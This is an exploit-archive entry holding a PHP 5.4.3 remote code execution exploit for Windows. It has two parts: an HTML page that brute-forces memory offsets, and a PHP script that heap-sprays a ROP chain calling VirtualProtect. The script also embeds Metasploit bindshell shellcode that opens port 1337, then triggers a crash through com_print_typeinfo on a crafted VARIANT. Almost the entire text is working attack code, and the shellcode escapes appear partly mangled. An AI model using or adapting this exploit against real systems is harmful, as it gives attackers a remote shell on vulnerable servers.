
# Title : PHP 5.4 (5.4.3) Code Execution (Win32)
# Published : 2012-05-11
# Author :
# Previous Title : Final Draft 8 Multiple Stack Buffer Overflows
# Next Title : BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)


// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)


===================
 offset-brute.html
===================

<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
// Synchronous busy-wait for roughly `milliseconds`: spins on the wall clock
// instead of using a timer, so it blocks the page while it runs.
// The spin is capped at 1e7 clock reads, so a very long wait may return early.
function sleep(milliseconds) {
  var deadline = new Date().getTime() + milliseconds;
  var spins = 0;
  while (spins < 1e7 && new Date().getTime() <= deadline) {
    spins++;
  }
}
// Fire an asynchronous GET to `url`. `parameters` is accepted but never used.
// Returns true once the request has been sent, false (after an alert) when
// no XMLHTTP object could be created.
// Note: the first statement of newClient() calls `new XMLHttpRequest()`
// before the feature test, so on a browser without that constructor the
// call throws and the ActiveX branch below it is never reached.
function makeRequest(url, parameters)
{
    function newClient() {
        var xhr = new XMLHttpRequest();
        if (window.XMLHttpRequest) {
            xhr = new XMLHttpRequest();
            if (xhr.overrideMimeType) {
                xhr.overrideMimeType('text/xml');
            }
        } else if (window.ActiveXObject) {
            // Legacy IE: try the newer MSXML ProgID first, then the original one.
            try {
                xhr = new ActiveXObject("Msxml2.XMLHTTP");
            } catch (e) {
                try {
                    xhr = new ActiveXObject("Microsoft.XMLHTTP");
                } catch (e) {}
            }
        }
        return xhr;
    }

    var client = newClient();
    if (!client) {
        alert('Giving up :( Cannot create an XMLHTTP instance');
        return false;
    }

    client.open("GET", url, true);
    client.send(null);
    return true;
}
test=document.getElementById("log");
for(offset=0;offset<300;offset++)
{
	log.value+="Trying offset:"+offset+"rn";
	makeRequest("0day.php?offset="+offset);
	sleep(500);
}

</script></body></html>



===================
     0day.php
===================

<?php 

$spray = str_repeat("x90",0x200); 
$offset=$_GET['offset'];
// 775DF0Da   # ADD ESP,10 # RETN    ** [ole32.dll] 
$spray = substr_replace($spray, "xdaxf0x5dx77", (strlen($spray))*-1,(strlen($spray))*-1); 
// :> 0x048d0030
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); 

//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN   [ole32.dll]
$spray = substr_replace($spray, "x9fxaex52x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); 

// Adress of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "xd4x1ax80x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);

//  LPVOID lpAddress  = 0x048d0060
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);

// SIZE_T dwSize  = 0x01000000 
$spray = substr_replace($spray, "x00x00x10x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);

// DWORD flNewProtect =  PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 
$spray = substr_replace($spray, "x40x00x00x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// __out  PDWORD lpflOldProtect = 0x04300070 | 0x105240000

// 0x048d0068
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);

//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C    ** [ADVAPI32.dll]
$spray = substr_replace($spray, "xb4xe8xdfx77", (strlen($spray)-0x18)*-1,4); 
// Ret Address = 0x048d0080 
$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); 



$stacktrack = "xbcx0cxb0xc0x00"; 
// Universal win32 bindshell on port 1337 from metasploit
$shellcode = $stacktrack."x33xc9x83xe9xb0".
  "x81xc4xd0xfdxffxff".
  "xd9xeexd9x74x24xf4x5bx81x73x13x1d".
  "xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96".
  "xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2".
  "x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0".
  "xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41".
  "x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82".
  "x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2".
  "x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39".
  "xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9".
  "x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b".
  "x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a".
  "x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88".
  "x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01".
  "xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20".
  "x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e".
  "xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39".
  "x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44".
  "xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96".
  "x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38".
  "xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9".
  "x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09".
  "x4ex33xe4x96xcdxccx32x69";


$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); 
$fullspray="";
for($i=0;$i<0x4b00;$i++)
{
	$fullspray.=$spray;
}
$j=array();
$e=array();
$b=array();
$a=array();
$c=array();

array_push($j,$fullspray);
array_push($e,$fullspray."W");
array_push($b,$fullspray."A");
array_push($a,$fullspray."S");
array_push($c,$fullspray."!");


$vVar = new VARIANT(0x048d0038+$offset); 
// Shoot him
com_print_typeinfo($vVar); //CRASH -> 102F3986   FF50 10          CALL DWORD PTR DS:[EAX+10]

echo $arr;

echo $spray;

?>